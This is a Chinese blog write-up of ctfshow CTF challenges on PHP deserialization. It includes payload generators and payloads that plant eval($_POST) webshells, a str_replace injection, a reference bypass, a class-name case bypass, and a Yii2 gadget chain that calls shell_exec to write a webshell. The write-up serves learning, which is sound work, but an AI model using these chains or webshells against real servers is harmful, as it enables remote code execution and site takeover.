[ctfshow]web入门——反序列化(web261+web264-web267)

[ctfshow]web入门——反序列化

ctfshow :https://ctf.show/challenges#web261-721
群主的视频wp :https://www.bilibili.com/video/BV1D64y1m78f

本文来自csdn的⭐️shu天⭐️,平时会记录ctf、取证和渗透相关的文章,欢迎大家来我的主页:shu天_CSDN博客-ctf,取证,web领域博主 看看ヾ(@ ˘ω˘ @)ノ!!


web261

<?php

highlight_file(__FILE__);   // echoes this file's own source to the client, so the class below is fully disclosed

// Challenge class: the unserialize() call further down builds instances of it from a GET parameter,
// so every property is attacker-controlled by the time the magic methods run.
class ctfshowvip{
    public $username;
    public $password;
    public $code;

    public function __construct($u,$p){
        $this->username=$u;
        $this->password=$p;
    }
    // Never runs on the unserialize() path: when __unserialize() is defined, PHP (7.4+) calls it
    // instead of __wakeup(), so this emptiness guard is bypassed.
    public function __wakeup(){	// bypassed because the __unserialize magic method exists
        if($this->username!='' || $this->password!=''){
            die('error');
        }
    }
    // Not reachable in this chain: nothing invokes the object as a callable, so eval() is unused.
    public function __invoke(){	// __invoke is never called, so eval cannot be reached
        eval($this->code);
    }

    // Only runs on serialize(); it does not protect the unserialize() side.
    public function __sleep(){
        $this->username='';
        $this->password='';
    }
    // Takes precedence over __wakeup() and copies the untrusted fields through unchecked;
    // $code becomes the concatenation of both.
    public function __unserialize($data){
        $this->username=$data['username'];
        $this->password=$data['password'];
        $this->code = $this->username.$this->password;
    }
    // Loose comparison (==) of a string against the int 0x36d (877): under PHP 7 a leading-numeric
    // string such as "877..." compares equal; PHP 8 compares int vs non-numeric string as strings,
    // so the condition no longer holds there. When it does hold, this writes attacker-controlled
    // content to an attacker-controlled path.
    public function __destruct(){
        if($this->code==0x36d){
            file_put_contents($this->username, $this->password);
        }
    }
}

// Deserialization of raw request input is the root cause here. Untrusted data should be exchanged as
// JSON (json_decode), or at minimum unserialize() should be called with allowed_classes restricted.
unserialize($_GET['vip']);

$this->code==0x36d是弱类型比较,0x36d没有引号代表数字,十六进制0x36d转为十进制是877。注意这一步依赖PHP 7的宽松比较规则:PHP 8中整数与"877.php..."这类非纯数字字符串比较时会按字符串比较,该条件不再成立
我们只要让username=877.php,password为一句话木马即可

<?php
// Payload generator for web261: mirrors the target's property layout (same names, same order) so the
// serialized string is accepted, with the values the target's __destruct() will write out. No magic
// methods are declared here — only the target's copies run.
class ctfshowvip{
    public $username;
    public $password;
    public $code;

    public function __construct($u='877.php',$p='<?php eval($_POST[a]);?>'){
        $this->username=$u;
        $this->password=$p;
    }

}
// urlencode keeps the serialized string intact as a GET parameter; $code is never set and serializes as N; (null).
echo urlencode(serialize(new ctfshowvip()))
?>

payload

O%3A10%3A%22ctfshowvip%22%3A3%3A%7Bs%3A8%3A%22username%22%3Bs%3A7%3A%22877.php%22%3Bs%3A8%3A%22password%22%3Bs%3A24%3A%22%3C%3Fphp+eval%28%24_POST%5Ba%5D%29%3B%3F%3E%22%3Bs%3A4%3A%22code%22%3BN%3B%7D

成功写入,连接即可


web264

str_replace字符串覆盖逃逸

<?php
@message.php

error_reporting(0);   // all warnings and notices are suppressed for the rest of the script
session_start();

class message{
    public $from;
    public $msg;
    public $to;
    public $token='user';   // not settable through the constructor; only the serialized form can change it
    public function __construct($f,$m,$t){
        $this->from = $f;
        $this->msg = $m;
        $this->to = $t;
    }
}

$f = $_GET['f'];
$m = $_GET['m'];
$t = $_GET['t'];

if(isset($f) && isset($m) && isset($t)){
    $msg = new message($f,$m,$t);
    // Replacing a 4-character word with a 5-character one AFTER serialize() changes string lengths
    // without updating the s:N: prefixes — the classic serialized-string injection. Any filtering
    // belongs on the fields before serialization, never on the serialized text.
    $umsg = str_replace('fuck', 'loveU', serialize($msg));
    $_SESSION['msg']=base64_encode($umsg);
    echo 'Your message has been sent';
}

highlight_file(__FILE__);

message.php

<?php
session_start();
highlight_file(__FILE__);
include('flag.php');   // presumably defines $flag, echoed below

class message{
    public $from;
    public $msg;
    public $to;
    public $token='user';   // the only value checked below; 'admin' is unreachable through the constructor
    public function __construct($f,$m,$t){
        $this->from = $f;
        $this->msg = $m;
        $this->to = $t;
    }
}

if(isset($_COOKIE['msg'])){
    // Only the cookie's presence is checked; the data actually deserialized comes from the session,
    // which the companion sender script populates with the str_replace-mangled string.
    $msg = unserialize(base64_decode($_SESSION['msg']));	// fetch the message from the session
    if($msg->token=='admin'){
        echo $flag;
    }
}

我们需要$token='admin',序列化后为s:5:"token";s:5:"admin";,再加上闭合前面$to字符串的";以及结尾的},即";s:5:"token";s:5:"admin";}一共27个字符。fuck→loveU每次替换多出1个字符,因此在$to中放27个fuck,就能把原本的";s:5:"token";s:5:"user";}挤出对象边界,使构造函数里的$token='user'失效

payload:
?f=1&m=1&t=fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck";s:5:"token";s:5:"admin";}

之后再访问message.php,并带上名为msg的cookie(代码只检查其是否存在)即可



web265

error_reporting(0);
include('flag.php');     // presumably defines $flag
highlight_file(__FILE__);
class ctfshowAdmin{
    public $token;
    public $password;

    public function __construct($t,$p){
        $this->token=$t;
        $this->password = $p;
    }
    // Strict (===) comparison, but both operands live in an object the caller deserialized. If the
    // serialized form makes password a PHP reference to token (an R: entry), the two properties are
    // one value and any later overwrite of token is seen by password as well.
    public function login(){
        return $this->token===$this->password;
    }
}

$ctfshow = unserialize($_GET['ctfshow']);   // untrusted object graph, PHP references (R:) included
$ctfshow->token=md5(mt_rand());             // re-keying token does not help if password aliases it;
                                            // mt_rand() is also not a CSPRNG

if($ctfshow->login()){
    echo $flag;
}

要让$this->token===$this->password,token的值我们不知道,可以用引用类型$this->password = &$this->token;

<?php
class ctfshowAdmin{
    public $token;
    public $password;

    public function __construct($t='',$p=''){
        $this->token=$t;
        $this->password = &$this->token;   // PHP reference: serialized as R:2; (token's slot), not as a copied value
    }
}
echo serialize(new ctfshowAdmin())   // the R:2; in the output is what keeps password equal to token after reassignment
?>

payload

O:12:"ctfshowAdmin":2:{s:5:"token";s:0:"";s:8:"password";R:2;}



web266

highlight_file(__FILE__);

include('flag.php');                        // presumably defines $flag, echoed by the destructor below
$cs = file_get_contents('php://input');     // raw request body; no method or content-type check


class ctfshow{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public function __construct($u,$p){
        $this->username=$u;
        $this->password=$p;
    }
    public function login(){
        return $this->username===$this->password;
    }
    // Used when the object is interpolated into a string (e.g. the exception message built below).
    public function __toString(){
        return $this->username;
    }
    // Runs whenever the object is released, including at script shutdown, so merely creating an
    // instance via unserialize() is enough for $flag to be echoed.
    public function __destruct(){
        global $flag;
        echo $flag;
    }
}
$ctfshowo=@unserialize($cs);   // deserialization happens BEFORE the filter below, and @ hides its warnings
// Case-sensitive match on the raw text, while PHP resolves class names case-insensitively, so the
// filter and unserialize() disagree about what counts as "ctfshow". Validation must precede deserialization.
if(preg_match('/ctfshow/', $cs)){
    throw new Exception("Error $ctfshowo",1);
}

因为$cs = file_get_contents('php://input'),直接把序列化串放在POST请求体中传入即可

<?php
// Minimal copy of the target class: no methods are needed here, the target's own __destruct() does the work.
class ctfshow{
    public $username='xxxxxx';
    public $password='xxxxxx';
}
echo serialize(new ctfshow())   // the class name in this output is then re-cased by hand to dodge the regex filter
?>

因为有if(preg_match('/ctfshow/', $cs))这一过滤,而PHP类名不区分大小写,unserialize时cTfshow仍会解析为ctfshow类,所以把类名改成cTfshow
payload

 O:7:"cTfshow":2:{s:8:"username";s:6:"xxxxxx";s:8:"password";s:6:"xxxxxx";}



web267

yii系列

源码可以看出是yii框架

admin/admin登录
about界面源码中多了一个注释<!--?view-source -->
get传数据/index.php?r=site%2Fabout&view-source

///backdoor/shell
unserialize(base64_decode($_GET['code']))

找个yii利用链

<?php
namespace yii\rest{
    // Stand-in declaration for the framework's yii\rest\CreateAction: only the two serialized
    // properties matter. The gadget relies on the real CreateAction::run() treating $checkAccess as a
    // callable and passing $id to it — confirm against the deployed Yii version.
    class CreateAction{
        public $checkAccess;
        public $id;
        public function __construct(){
            $this->checkAccess = 'phpinfo';
            $this->id = '1';
        }
    }
}

namespace Faker{
    use yii\rest\CreateAction;

    // Stand-in for Faker\Generator. The real class dispatches unknown method calls through its
    // $formatters map (presumably via __call), so a ->close() call on this object would reach
    // CreateAction::run() — verify against the bundled Faker version.
    class Generator{
        protected $formatters;

        public function __construct(){
            $this->formatters['close'] = [new CreateAction(), 'run'];
        }
    }
}

namespace yii\db{
    use Faker\Generator;

    // Entry point of the chain: it relies on the framework's BatchQueryResult destructor closing its
    // data reader, which here is the Generator above. The property is private, so its serialized
    // name carries the class prefix. Later Yii 2 releases are reported to reject unserialized
    // instances of this class — confirm for the version in use.
    class BatchQueryResult{
        private $_dataReader;

        public function __construct(){
            $this->_dataReader = new Generator;
        }
    }
}
namespace{
    // Global-namespace wrapper: prints the base64 form that the backdoor's unserialize(base64_decode(...)) consumes.
    echo base64_encode(serialize(new yii\db\BatchQueryResult));
}
?>

system无回显,利用dnslog,命令执行
得到web目录/var/www/html/basic/web
然后写shell,折磨死我了,改了好多遍
注意双引号字符串里的$要转义为\$,且system用不了,要换成其他能执行命令的函数

namespace yii\rest{
    // Same stand-in as the earlier CreateAction, with the callable swapped to shell_exec and a command
    // that drops a PHP file under the web root. The \$ is escaped only so PHP's double-quoted
    // interpolation leaves a literal $ in the command. From an incident-response view the artifact
    // this leaves is a new .php file in /var/www/html/basic/web.
    class CreateAction{
        public $checkAccess;
        public $id;
        public function __construct(){
            $this->checkAccess = 'shell_exec';
            $this->id = "echo '<?php eval(\$_POST[g]);?>' > /var/www/html/basic/web/3.php";
        }
    }
}



本文来自csdn的⭐️shu天⭐️,平时会记录ctf、取证和渗透相关的文章,欢迎大家来我的主页:shu天_CSDN博客-ctf,取证,web领域博主 看看ヾ(@ ˘ω˘ @)ノ!!